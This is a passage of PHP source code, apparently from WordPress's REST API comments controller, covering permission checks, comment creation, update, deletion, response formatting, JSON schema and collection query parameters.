* @return WP_Error|bool True if the request has read access for the item, error object otherwise.
*/
public function get_item_permissions_check( $request ) {
$comment = $this->get_comment( $request['id'] );
if ( is_wp_error( $comment ) ) {
return $comment;
}
if ( ! empty( $request['context'] ) && 'edit' === $request['context'] && ! current_user_can( 'moderate_comments' ) ) {
return new WP_Error( 'rest_forbidden_context', __( 'Sorry, you are not allowed to edit comments.' ), array( 'status' => rest_authorization_required_code() ) );
}
$post = get_post( $comment->comment_post_ID );
if ( ! $this->check_read_permission( $comment, $request ) ) {
return new WP_Error( 'rest_cannot_read', __( 'Sorry, you are not allowed to read this comment.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( $post && ! $this->check_read_post_permission( $post, $request ) ) {
return new WP_Error( 'rest_cannot_read_post', __( 'Sorry, you are not allowed to read the post for this comment.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Retrieves a comment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, or error object on failure.
*/
public function get_item( $request ) {
$comment = $this->get_comment( $request['id'] );
if ( is_wp_error( $comment ) ) {
return $comment;
}
$data = $this->prepare_item_for_response( $comment, $request );
$response = rest_ensure_response( $data );
return $response;
}
/**
* Checks if a given request has access to create a comment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|bool True if the request has access to create items, error object otherwise.
*/
public function create_item_permissions_check( $request ) {
if ( ! is_user_logged_in() ) {
if ( get_option( 'comment_registration' ) ) {
return new WP_Error( 'rest_comment_login_required', __( 'Sorry, you must be logged in to comment.' ), array( 'status' => 401 ) );
}
/**
* Filter whether comments can be created without authentication.
*
* Enables creating comments for anonymous users.
*
* @since 4.7.0
*
* @param bool $allow_anonymous Whether to allow anonymous comments to
* be created. Default `false`.
* @param WP_REST_Request $request Request used to generate the
* response.
*/
$allow_anonymous = apply_filters( 'rest_allow_anonymous_comments', false, $request );
if ( ! $allow_anonymous ) {
return new WP_Error( 'rest_comment_login_required', __( 'Sorry, you must be logged in to comment.' ), array( 'status' => 401 ) );
}
}
// Limit who can set comment `author`, `author_ip` or `status` to anything other than the default.
if ( isset( $request['author'] ) && get_current_user_id() !== $request['author'] && ! current_user_can( 'moderate_comments' ) ) {
return new WP_Error( 'rest_comment_invalid_author',
/* translators: %s: request parameter */
sprintf( __( "Sorry, you are not allowed to edit '%s' for comments." ), 'author' ),
array( 'status' => rest_authorization_required_code() )
);
}
if ( isset( $request['author_ip'] ) && ! current_user_can( 'moderate_comments' ) ) {
if ( empty( $_SERVER['REMOTE_ADDR'] ) || $request['author_ip'] !== $_SERVER['REMOTE_ADDR'] ) {
return new WP_Error( 'rest_comment_invalid_author_ip',
/* translators: %s: request parameter */
sprintf( __( "Sorry, you are not allowed to edit '%s' for comments." ), 'author_ip' ),
array( 'status' => rest_authorization_required_code() )
);
}
}
if ( isset( $request['status'] ) && ! current_user_can( 'moderate_comments' ) ) {
return new WP_Error( 'rest_comment_invalid_status',
/* translators: %s: request parameter */
sprintf( __( "Sorry, you are not allowed to edit '%s' for comments." ), 'status' ),
array( 'status' => rest_authorization_required_code() )
);
}
if ( empty( $request['post'] ) ) {
return new WP_Error( 'rest_comment_invalid_post_id', __( 'Sorry, you are not allowed to create this comment without a post.' ), array( 'status' => 403 ) );
}
$post = get_post( (int) $request['post'] );
if ( ! $post ) {
return new WP_Error( 'rest_comment_invalid_post_id', __( 'Sorry, you are not allowed to create this comment without a post.' ), array( 'status' => 403 ) );
}
if ( 'draft' === $post->post_status ) {
return new WP_Error( 'rest_comment_draft_post', __( 'Sorry, you are not allowed to create a comment on this post.' ), array( 'status' => 403 ) );
}
if ( 'trash' === $post->post_status ) {
return new WP_Error( 'rest_comment_trash_post', __( 'Sorry, you are not allowed to create a comment on this post.' ), array( 'status' => 403 ) );
}
if ( ! $this->check_read_post_permission( $post, $request ) ) {
return new WP_Error( 'rest_cannot_read_post', __( 'Sorry, you are not allowed to read the post for this comment.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( ! comments_open( $post->ID ) ) {
return new WP_Error( 'rest_comment_closed', __( 'Sorry, comments are closed for this item.' ), array( 'status' => 403 ) );
}
return true;
}
/**
* Creates a comment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, or error object on failure.
*/
public function create_item( $request ) {
if ( ! empty( $request['id'] ) ) {
return new WP_Error( 'rest_comment_exists', __( 'Cannot create existing comment.' ), array( 'status' => 400 ) );
}
// Do not allow comments to be created with a non-default type.
if ( ! empty( $request['type'] ) && 'comment' !== $request['type'] ) {
return new WP_Error( 'rest_invalid_comment_type', __( 'Cannot create a comment with that type.' ), array( 'status' => 400 ) );
}
$prepared_comment = $this->prepare_item_for_database( $request );
if ( is_wp_error( $prepared_comment ) ) {
return $prepared_comment;
}
$prepared_comment['comment_type'] = '';
/*
* Do not allow a comment to be created with missing or empty
* comment_content. See wp_handle_comment_submission().
*/
if ( empty( $prepared_comment['comment_content'] ) ) {
return new WP_Error( 'rest_comment_content_invalid', __( 'Invalid comment content.' ), array( 'status' => 400 ) );
}
// Setting remaining values before wp_insert_comment so we can use wp_allow_comment().
if ( ! isset( $prepared_comment['comment_date_gmt'] ) ) {
$prepared_comment['comment_date_gmt'] = current_time( 'mysql', true );
}
// Set author data if the user's logged in.
$missing_author = empty( $prepared_comment['user_id'] )
&& empty( $prepared_comment['comment_author'] )
&& empty( $prepared_comment['comment_author_email'] )
&& empty( $prepared_comment['comment_author_url'] );
if ( is_user_logged_in() && $missing_author ) {
$user = wp_get_current_user();
$prepared_comment['user_id'] = $user->ID;
$prepared_comment['comment_author'] = $user->display_name;
$prepared_comment['comment_author_email'] = $user->user_email;
$prepared_comment['comment_author_url'] = $user->user_url;
}
// Honor the discussion setting that requires a name and email address of the comment author.
if ( get_option( 'require_name_email' ) ) {
if ( empty( $prepared_comment['comment_author'] ) || empty( $prepared_comment['comment_author_email'] ) ) {
return new WP_Error( 'rest_comment_author_data_required', __( 'Creating a comment requires valid author name and email values.' ), array( 'status' => 400 ) );
}
}
if ( ! isset( $prepared_comment['comment_author_email'] ) ) {
$prepared_comment['comment_author_email'] = '';
}
if ( ! isset( $prepared_comment['comment_author_url'] ) ) {
$prepared_comment['comment_author_url'] = '';
}
if ( ! isset( $prepared_comment['comment_agent'] ) ) {
$prepared_comment['comment_agent'] = '';
}
$check_comment_lengths = wp_check_comment_data_max_lengths( $prepared_comment );
if ( is_wp_error( $check_comment_lengths ) ) {
$error_code = $check_comment_lengths->get_error_code();
return new WP_Error( $error_code, __( 'Comment field exceeds maximum length allowed.' ), array( 'status' => 400 ) );
}
$prepared_comment['comment_approved'] = wp_allow_comment( $prepared_comment, true );
if ( is_wp_error( $prepared_comment['comment_approved'] ) ) {
$error_code = $prepared_comment['comment_approved']->get_error_code();
$error_message = $prepared_comment['comment_approved']->get_error_message();
if ( 'comment_duplicate' === $error_code ) {
return new WP_Error( $error_code, $error_message, array( 'status' => 409 ) );
}
if ( 'comment_flood' === $error_code ) {
return new WP_Error( $error_code, $error_message, array( 'status' => 400 ) );
}
return $prepared_comment['comment_approved'];
}
/**
* Filters a comment before it is inserted via the REST API.
*
* Allows modification of the comment right before it is inserted via wp_insert_comment().
* Returning a WP_Error value from the filter will shortcircuit insertion and allow
* skipping further processing.
*
* @since 4.7.0
* @since 4.8.0 $prepared_comment can now be a WP_Error to shortcircuit insertion.
*
* @param array|WP_Error $prepared_comment The prepared comment data for wp_insert_comment().
* @param WP_REST_Request $request Request used to insert the comment.
*/
$prepared_comment = apply_filters( 'rest_pre_insert_comment', $prepared_comment, $request );
if ( is_wp_error( $prepared_comment ) ) {
return $prepared_comment;
}
$comment_id = wp_insert_comment( wp_filter_comment( wp_slash( (array) $prepared_comment ) ) );
if ( ! $comment_id ) {
return new WP_Error( 'rest_comment_failed_create', __( 'Creating comment failed.' ), array( 'status' => 500 ) );
}
if ( isset( $request['status'] ) ) {
$this->handle_status_param( $request['status'], $comment_id );
}
$comment = get_comment( $comment_id );
/**
* Fires after a comment is created or updated via the REST API.
*
* @since 4.7.0
*
* @param WP_Comment $comment Inserted or updated comment object.
* @param WP_REST_Request $request Request object.
* @param bool $creating True when creating a comment, false
* when updating.
*/
do_action( 'rest_insert_comment', $comment, $request, true );
$schema = $this->get_item_schema();
if ( ! empty( $schema['properties']['meta'] ) && isset( $request['meta'] ) ) {
$meta_update = $this->meta->update_value( $request['meta'], $comment_id );
if ( is_wp_error( $meta_update ) ) {
return $meta_update;
}
}
$fields_update = $this->update_additional_fields_for_object( $comment, $request );
if ( is_wp_error( $fields_update ) ) {
return $fields_update;
}
$context = current_user_can( 'moderate_comments' ) ? 'edit' : 'view';
$request->set_param( 'context', $context );
/**
* Fires completely after a comment is created or updated via the REST API.
*
* @since 5.0.0
*
* @param WP_Comment $comment Inserted or updated comment object.
* @param WP_REST_Request $request Request object.
* @param bool $creating True when creating a comment, false
* when updating.
*/
do_action( 'rest_after_insert_comment', $comment, $request, true );
$response = $this->prepare_item_for_response( $comment, $request );
$response = rest_ensure_response( $response );
$response->set_status( 201 );
$response->header( 'Location', rest_url( sprintf( '%s/%s/%d', $this->namespace, $this->rest_base, $comment_id ) ) );
return $response;
}
/**
* Checks if a given REST request has access to update a comment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|bool True if the request has access to update the item, error object otherwise.
*/
public function update_item_permissions_check( $request ) {
$comment = $this->get_comment( $request['id'] );
if ( is_wp_error( $comment ) ) {
return $comment;
}
if ( ! $this->check_edit_permission( $comment ) ) {
return new WP_Error( 'rest_cannot_edit', __( 'Sorry, you are not allowed to edit this comment.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Updates a comment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, or error object on failure.
*/
public function update_item( $request ) {
$comment = $this->get_comment( $request['id'] );
if ( is_wp_error( $comment ) ) {
return $comment;
}
$id = $comment->comment_ID;
if ( isset( $request['type'] ) && get_comment_type( $id ) !== $request['type'] ) {
return new WP_Error( 'rest_comment_invalid_type', __( 'Sorry, you are not allowed to change the comment type.' ), array( 'status' => 404 ) );
}
$prepared_args = $this->prepare_item_for_database( $request );
if ( is_wp_error( $prepared_args ) ) {
return $prepared_args;
}
if ( ! empty( $prepared_args['comment_post_ID'] ) ) {
$post = get_post( $prepared_args['comment_post_ID'] );
if ( empty( $post ) ) {
return new WP_Error( 'rest_comment_invalid_post_id', __( 'Invalid post ID.' ), array( 'status' => 403 ) );
}
}
if ( empty( $prepared_args ) && isset( $request['status'] ) ) {
// Only the comment status is being changed.
$change = $this->handle_status_param( $request['status'], $id );
if ( ! $change ) {
return new WP_Error( 'rest_comment_failed_edit', __( 'Updating comment status failed.' ), array( 'status' => 500 ) );
}
} elseif ( ! empty( $prepared_args ) ) {
if ( is_wp_error( $prepared_args ) ) {
return $prepared_args;
}
if ( isset( $prepared_args['comment_content'] ) && empty( $prepared_args['comment_content'] ) ) {
return new WP_Error( 'rest_comment_content_invalid', __( 'Invalid comment content.' ), array( 'status' => 400 ) );
}
$prepared_args['comment_ID'] = $id;
$check_comment_lengths = wp_check_comment_data_max_lengths( $prepared_args );
if ( is_wp_error( $check_comment_lengths ) ) {
$error_code = $check_comment_lengths->get_error_code();
return new WP_Error( $error_code, __( 'Comment field exceeds maximum length allowed.' ), array( 'status' => 400 ) );
}
$updated = wp_update_comment( wp_slash( (array) $prepared_args ) );
if ( false === $updated ) {
return new WP_Error( 'rest_comment_failed_edit', __( 'Updating comment failed.' ), array( 'status' => 500 ) );
}
if ( isset( $request['status'] ) ) {
$this->handle_status_param( $request['status'], $id );
}
}
$comment = get_comment( $id );
/** This action is documented in wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php */
do_action( 'rest_insert_comment', $comment, $request, false );
$schema = $this->get_item_schema();
if ( ! empty( $schema['properties']['meta'] ) && isset( $request['meta'] ) ) {
$meta_update = $this->meta->update_value( $request['meta'], $id );
if ( is_wp_error( $meta_update ) ) {
return $meta_update;
}
}
$fields_update = $this->update_additional_fields_for_object( $comment, $request );
if ( is_wp_error( $fields_update ) ) {
return $fields_update;
}
$request->set_param( 'context', 'edit' );
/** This action is documented in wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php */
do_action( 'rest_after_insert_comment', $comment, $request, false );
$response = $this->prepare_item_for_response( $comment, $request );
return rest_ensure_response( $response );
}
/**
* Checks if a given request has access to delete a comment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|bool True if the request has access to delete the item, error object otherwise.
*/
public function delete_item_permissions_check( $request ) {
$comment = $this->get_comment( $request['id'] );
if ( is_wp_error( $comment ) ) {
return $comment;
}
if ( ! $this->check_edit_permission( $comment ) ) {
return new WP_Error( 'rest_cannot_delete', __( 'Sorry, you are not allowed to delete this comment.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Deletes a comment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, or error object on failure.
*/
public function delete_item( $request ) {
$comment = $this->get_comment( $request['id'] );
if ( is_wp_error( $comment ) ) {
return $comment;
}
$force = isset( $request['force'] ) ? (bool) $request['force'] : false;
/**
* Filters whether a comment can be trashed.
*
* Return false to disable trash support for the post.
*
* @since 4.7.0
*
* @param bool $supports_trash Whether the post type support trashing.
* @param WP_Post $comment The comment object being considered for trashing support.
*/
$supports_trash = apply_filters( 'rest_comment_trashable', ( EMPTY_TRASH_DAYS > 0 ), $comment );
$request->set_param( 'context', 'edit' );
if ( $force ) {
$previous = $this->prepare_item_for_response( $comment, $request );
$result = wp_delete_comment( $comment->comment_ID, true );
$response = new WP_REST_Response();
$response->set_data( array( 'deleted' => true, 'previous' => $previous->get_data() ) );
} else {
// If this type doesn't support trashing, error out.
if ( ! $supports_trash ) {
/* translators: %s: force=true */
return new WP_Error( 'rest_trash_not_supported', sprintf( __( "The comment does not support trashing. Set '%s' to delete." ), 'force=true' ), array( 'status' => 501 ) );
}
if ( 'trash' === $comment->comment_approved ) {
return new WP_Error( 'rest_already_trashed', __( 'The comment has already been trashed.' ), array( 'status' => 410 ) );
}
$result = wp_trash_comment( $comment->comment_ID );
$comment = get_comment( $comment->comment_ID );
$response = $this->prepare_item_for_response( $comment, $request );
}
if ( ! $result ) {
return new WP_Error( 'rest_cannot_delete', __( 'The comment cannot be deleted.' ), array( 'status' => 500 ) );
}
/**
* Fires after a comment is deleted via the REST API.
*
* @since 4.7.0
*
* @param WP_Comment $comment The deleted comment data.
* @param WP_REST_Response $response The response returned from the API.
* @param WP_REST_Request $request The request sent to the API.
*/
do_action( 'rest_delete_comment', $comment, $response, $request );
return $response;
}
/**
* Prepares a single comment output for response.
*
* @since 4.7.0
*
* @param WP_Comment $comment Comment object.
* @param WP_REST_Request $request Request object.
* @return WP_REST_Response Response object.
*/
public function prepare_item_for_response( $comment, $request ) {
$fields = $this->get_fields_for_response( $request );
$data = array();
if ( in_array( 'id', $fields, true ) ) {
$data['id'] = (int) $comment->comment_ID;
}
if ( in_array( 'post', $fields, true ) ) {
$data['post'] = (int) $comment->comment_post_ID;
}
if ( in_array( 'parent', $fields, true ) ) {
$data['parent'] = (int) $comment->comment_parent;
}
if ( in_array( 'author', $fields, true ) ) {
$data['author'] = (int) $comment->user_id;
}
if ( in_array( 'author_name', $fields, true ) ) {
$data['author_name'] = $comment->comment_author;
}
if ( in_array( 'author_email', $fields, true ) ) {
$data['author_email'] = $comment->comment_author_email;
}
if ( in_array( 'author_url', $fields, true ) ) {
$data['author_url'] = $comment->comment_author_url;
}
if ( in_array( 'author_ip', $fields, true ) ) {
$data['author_ip'] = $comment->comment_author_IP;
}
if ( in_array( 'author_user_agent', $fields, true ) ) {
$data['author_user_agent'] = $comment->comment_agent;
}
if ( in_array( 'date', $fields, true ) ) {
$data['date'] = mysql_to_rfc3339( $comment->comment_date );
}
if ( in_array( 'date_gmt', $fields, true ) ) {
$data['date_gmt'] = mysql_to_rfc3339( $comment->comment_date_gmt );
}
if ( in_array( 'content', $fields, true ) ) {
$data['content'] = array(
/** This filter is documented in wp-includes/comment-template.php */
'rendered' => apply_filters( 'comment_text', $comment->comment_content, $comment ),
'raw' => $comment->comment_content,
);
}
if ( in_array( 'link', $fields, true ) ) {
$data['link'] = get_comment_link( $comment );
}
if ( in_array( 'status', $fields, true ) ) {
$data['status'] = $this->prepare_status_response( $comment->comment_approved );
}
if ( in_array( 'type', $fields, true ) ) {
$data['type'] = get_comment_type( $comment->comment_ID );
}
if ( in_array( 'author_avatar_urls', $fields, true ) ) {
$data['author_avatar_urls'] = rest_get_avatar_urls( $comment->comment_author_email );
}
if ( in_array( 'meta', $fields, true ) ) {
$data['meta'] = $this->meta->get_value( $comment->comment_ID, $request );
}
$context = ! empty( $request['context'] ) ? $request['context'] : 'view';
$data = $this->add_additional_fields_to_object( $data, $request );
$data = $this->filter_response_by_context( $data, $context );
// Wrap the data in a response object.
$response = rest_ensure_response( $data );
$response->add_links( $this->prepare_links( $comment ) );
/**
* Filters a comment returned from the API.
*
* Allows modification of the comment right before it is returned.
*
* @since 4.7.0
*
* @param WP_REST_Response $response The response object.
* @param WP_Comment $comment The original comment object.
* @param WP_REST_Request $request Request used to generate the response.
*/
return apply_filters( 'rest_prepare_comment', $response, $comment, $request );
}
/**
* Prepares links for the request.
*
* @since 4.7.0
*
* @param WP_Comment $comment Comment object.
* @return array Links for the given comment.
*/
protected function prepare_links( $comment ) {
$links = array(
'self' => array(
'href' => rest_url( sprintf( '%s/%s/%d', $this->namespace, $this->rest_base, $comment->comment_ID ) ),
),
'collection' => array(
'href' => rest_url( sprintf( '%s/%s', $this->namespace, $this->rest_base ) ),
),
);
if ( 0 !== (int) $comment->user_id ) {
$links['author'] = array(
'href' => rest_url( 'wp/v2/users/' . $comment->user_id ),
'embeddable' => true,
);
}
if ( 0 !== (int) $comment->comment_post_ID ) {
$post = get_post( $comment->comment_post_ID );
if ( ! empty( $post->ID ) ) {
$obj = get_post_type_object( $post->post_type );
$base = ! empty( $obj->rest_base ) ? $obj->rest_base : $obj->name;
$links['up'] = array(
'href' => rest_url( 'wp/v2/' . $base . '/' . $comment->comment_post_ID ),
'embeddable' => true,
'post_type' => $post->post_type,
);
}
}
if ( 0 !== (int) $comment->comment_parent ) {
$links['in-reply-to'] = array(
'href' => rest_url( sprintf( '%s/%s/%d', $this->namespace, $this->rest_base, $comment->comment_parent ) ),
'embeddable' => true,
);
}
// Only grab one comment to verify the comment has children.
$comment_children = $comment->get_children( array(
'number' => 1,
'count' => true
) );
if ( ! empty( $comment_children ) ) {
$args = array(
'parent' => $comment->comment_ID
);
$rest_url = add_query_arg( $args, rest_url( $this->namespace . '/' . $this->rest_base ) );
$links['children'] = array(
'href' => $rest_url,
);
}
return $links;
}
/**
* Prepends internal property prefix to query parameters to match our response fields.
*
* @since 4.7.0
*
* @param string $query_param Query parameter.
* @return string The normalized query parameter.
*/
protected function normalize_query_param( $query_param ) {
$prefix = 'comment_';
switch ( $query_param ) {
case 'id':
$normalized = $prefix . 'ID';
break;
case 'post':
$normalized = $prefix . 'post_ID';
break;
case 'parent':
$normalized = $prefix . 'parent';
break;
case 'include':
$normalized = 'comment__in';
break;
default:
$normalized = $prefix . $query_param;
break;
}
return $normalized;
}
/**
* Checks comment_approved to set comment status for single comment output.
*
* @since 4.7.0
*
* @param string|int $comment_approved comment status.
* @return string Comment status.
*/
protected function prepare_status_response( $comment_approved ) {
switch ( $comment_approved ) {
case 'hold':
case '0':
$status = 'hold';
break;
case 'approve':
case '1':
$status = 'approved';
break;
case 'spam':
case 'trash':
default:
$status = $comment_approved;
break;
}
return $status;
}
/**
* Prepares a single comment to be inserted into the database.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Request object.
* @return array|WP_Error Prepared comment, otherwise WP_Error object.
*/
protected function prepare_item_for_database( $request ) {
$prepared_comment = array();
/*
* Allow the comment_content to be set via the 'content' or
* the 'content.raw' properties of the Request object.
*/
if ( isset( $request['content'] ) && is_string( $request['content'] ) ) {
$prepared_comment['comment_content'] = $request['content'];
} elseif ( isset( $request['content']['raw'] ) && is_string( $request['content']['raw'] ) ) {
$prepared_comment['comment_content'] = $request['content']['raw'];
}
if ( isset( $request['post'] ) ) {
$prepared_comment['comment_post_ID'] = (int) $request['post'];
}
if ( isset( $request['parent'] ) ) {
$prepared_comment['comment_parent'] = $request['parent'];
}
if ( isset( $request['author'] ) ) {
$user = new WP_User( $request['author'] );
if ( $user->exists() ) {
$prepared_comment['user_id'] = $user->ID;
$prepared_comment['comment_author'] = $user->display_name;
$prepared_comment['comment_author_email'] = $user->user_email;
$prepared_comment['comment_author_url'] = $user->user_url;
} else {
return new WP_Error( 'rest_comment_author_invalid', __( 'Invalid comment author ID.' ), array( 'status' => 400 ) );
}
}
if ( isset( $request['author_name'] ) ) {
$prepared_comment['comment_author'] = $request['author_name'];
}
if ( isset( $request['author_email'] ) ) {
$prepared_comment['comment_author_email'] = $request['author_email'];
}
if ( isset( $request['author_url'] ) ) {
$prepared_comment['comment_author_url'] = $request['author_url'];
}
if ( isset( $request['author_ip'] ) && current_user_can( 'moderate_comments' ) ) {
$prepared_comment['comment_author_IP'] = $request['author_ip'];
} elseif ( ! empty( $_SERVER['REMOTE_ADDR'] ) && rest_is_ip_address( $_SERVER['REMOTE_ADDR'] ) ) {
$prepared_comment['comment_author_IP'] = $_SERVER['REMOTE_ADDR'];
} else {
$prepared_comment['comment_author_IP'] = '127.0.0.1';
}
if ( ! empty( $request['author_user_agent'] ) ) {
$prepared_comment['comment_agent'] = $request['author_user_agent'];
} elseif ( $request->get_header( 'user_agent' ) ) {
$prepared_comment['comment_agent'] = $request->get_header( 'user_agent' );
}
if ( ! empty( $request['date'] ) ) {
$date_data = rest_get_date_with_gmt( $request['date'] );
if ( ! empty( $date_data ) ) {
list( $prepared_comment['comment_date'], $prepared_comment['comment_date_gmt'] ) = $date_data;
}
} elseif ( ! empty( $request['date_gmt'] ) ) {
$date_data = rest_get_date_with_gmt( $request['date_gmt'], true );
if ( ! empty( $date_data ) ) {
list( $prepared_comment['comment_date'], $prepared_comment['comment_date_gmt'] ) = $date_data;
}
}
/**
* Filters a comment after it is prepared for the database.
*
* Allows modification of the comment right after it is prepared for the database.
*
* @since 4.7.0
*
* @param array $prepared_comment The prepared comment data for `wp_insert_comment`.
* @param WP_REST_Request $request The current request.
*/
return apply_filters( 'rest_preprocess_comment', $prepared_comment, $request );
}
/**
* Retrieves the comment's schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array
*/
public function get_item_schema() {
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => 'comment',
'type' => 'object',
'properties' => array(
'id' => array(
'description' => __( 'Unique identifier for the object.' ),
'type' => 'integer',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
'author' => array(
'description' => __( 'The ID of the user object, if author was a user.' ),
'type' => 'integer',
'context' => array( 'view', 'edit', 'embed' ),
),
'author_email' => array(
'description' => __( 'Email address for the object author.' ),
'type' => 'string',
'format' => 'email',
'context' => array( 'edit' ),
'arg_options' => array(
'sanitize_callback' => array( $this, 'check_comment_author_email' ),
'validate_callback' => null, // skip built-in validation of 'email'.
),
),
'author_ip' => array(
'description' => __( 'IP address for the object author.' ),
'type' => 'string',
'format' => 'ip',
'context' => array( 'edit' ),
),
'author_name' => array(
'description' => __( 'Display name for the object author.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'arg_options' => array(
'sanitize_callback' => 'sanitize_text_field',
),
),
'author_url' => array(
'description' => __( 'URL for the object author.' ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'view', 'edit', 'embed' ),
),
'author_user_agent' => array(
'description' => __( 'User agent for the object author.' ),
'type' => 'string',
'context' => array( 'edit' ),
'arg_options' => array(
'sanitize_callback' => 'sanitize_text_field',
),
),
'content' => array(
'description' => __( 'The content for the object.' ),
'type' => 'object',
'context' => array( 'view', 'edit', 'embed' ),
'arg_options' => array(
'sanitize_callback' => null, // Note: sanitization implemented in self::prepare_item_for_database()
'validate_callback' => null, // Note: validation implemented in self::prepare_item_for_database()
),
'properties' => array(
'raw' => array(
'description' => __( 'Content for the object, as it exists in the database.' ),
'type' => 'string',
'context' => array( 'edit' ),
),
'rendered' => array(
'description' => __( 'HTML content for the object, transformed for display.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
),
),
'date' => array(
'description' => __( "The date the object was published, in the site's timezone." ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'view', 'edit', 'embed' ),
),
'date_gmt' => array(
'description' => __( 'The date the object was published, as GMT.' ),
'type' => 'string',
'format' => 'date-time',
'context' => array( 'view', 'edit' ),
),
'link' => array(
'description' => __( 'URL to the object.' ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
'parent' => array(
'description' => __( 'The ID for the parent of the object.' ),
'type' => 'integer',
'context' => array( 'view', 'edit', 'embed' ),
'default' => 0,
),
'post' => array(
'description' => __( 'The ID of the associated post object.' ),
'type' => 'integer',
'context' => array( 'view', 'edit' ),
'default' => 0,
),
'status' => array(
'description' => __( 'State of the object.' ),
'type' => 'string',
'context' => array( 'view', 'edit' ),
'arg_options' => array(
'sanitize_callback' => 'sanitize_key',
),
),
'type' => array(
'description' => __( 'Type of Comment for the object.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
),
);
if ( get_option( 'show_avatars' ) ) {
$avatar_properties = array();
$avatar_sizes = rest_get_avatar_sizes();
foreach ( $avatar_sizes as $size ) {
$avatar_properties[ $size ] = array(
/* translators: %d: avatar image size in pixels */
'description' => sprintf( __( 'Avatar URL with image size of %d pixels.' ), $size ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'embed', 'view', 'edit' ),
);
}
$schema['properties']['author_avatar_urls'] = array(
'description' => __( 'Avatar URLs for the object author.' ),
'type' => 'object',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
'properties' => $avatar_properties,
);
}
$schema['properties']['meta'] = $this->meta->get_field_schema();
return $this->add_additional_fields_schema( $schema );
}
/**
* Retrieves the query params for collections.
*
* @since 4.7.0
*
* @return array Comments collection parameters.
*/
public function get_collection_params() {
$query_params = parent::get_collection_params();
$query_params['context']['default'] = 'view';
$query_params['after'] = array(
'description' => __( 'Limit response to comments published after a given ISO8601 compliant date.' ),
'type' => 'string',
'format' => 'date-time',
);
$query_params['author'] = array(
'description' => __( 'Limit result set to comments assigned to specific user IDs. Requires authorization.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
);
$query_params['author_exclude'] = array(
'description' => __( 'Ensure result set excludes comments assigned to specific user IDs. Requires authorization.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
);
$query_params['author_email'] = array(
'default' => null,
'description' => __( 'Limit result set to that from a specific author email. Requires authorization.' ),
'format' => 'email',
'type' => 'string',
);
$query_params['before'] = array(
'description' => __( 'Limit response to comments published before a given ISO8601 compliant date.' ),
'type' => 'string',
'format' => 'date-time',
);
$query_params['exclude'] = array(
'description' => __( 'Ensure result set excludes specific IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params['include'] = array(
'description' => __( 'Limit result set to specific IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params['offset'] = array(
'description' => __( 'Offset the result set by a specific number of items.' ),
'type' => 'integer',
);
$query_params['order'] = array(
'description' => __( 'Order sort attribute ascending or descending.' ),
'type' => 'string',
'default' => 'desc',
'enum' => array(
'asc',
'desc',
),
);
$query_params['orderby'] = array(
'description' => __( 'Sort collection by object attribute.' ),
'type' => 'string',
'default' => 'date_gmt',
'enum' => array(
'date',
'date_gmt',
'id',
'include',
'post',
'parent',
'type',
),
);
$query_params['parent'] = array(
'default' => array(),
'description' => __( 'Limit result set to comments of specific parent IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
);
$query_params['parent_exclude'] = array(
'default' => array(),
'description' => __( 'Ensure result set excludes specific parent IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
);
$query_params['post'] = array(
'default' => array(),
'description' => __( 'Limit result set to comments assigned to specific post IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
);
$query_params['status'] = array(
'default' => 'approve',
'description' => __( 'Limit result set to comments assigned a specific status. Requires authorization.' ),
'sanitize_callback' => 'sanitize_key',
'type' => 'string',
'validate_callback' => 'rest_validate_request_arg',
);
$query_params['type'] = array(
'default' => 'comment',
'description' => __( 'Limit result set to comments assigned a specific type. Requires authorization.' ),
'sanitize_callback' => 'sanitize_key',
'type' => 'string',
'validate_callback' => 'rest_validate_request_arg',
);
$query_params['password'] = array(
'description' => __( 'The password for the post if it is password protected.' ),
'type' => 'string',
);
/**
* Filter collection parameters for the comments controller.
*
* This filter registers the collection parameter, but does not map the
* collection parameter to an internal WP_Comment_Query parameter. Use the
* `rest_comment_query` filter to set WP_Comment_Query parameters.
*
* @since 4.7.0
*
* @param array $query_params JSON Schema-formatted collection parameters.
*/
return apply_filters( 'rest_comment_collection_params', $query_params );
}
/**
* Sets the comment_status of a given comment object when creating or updating a comment.
*
* @since 4.7.0
*
* @param string|int $new_status New comment status.
* @param int $comment_id Comment ID.
* @return bool Whether the status was changed.
*/
protected function handle_status_param( $new_status, $comment_id ) {
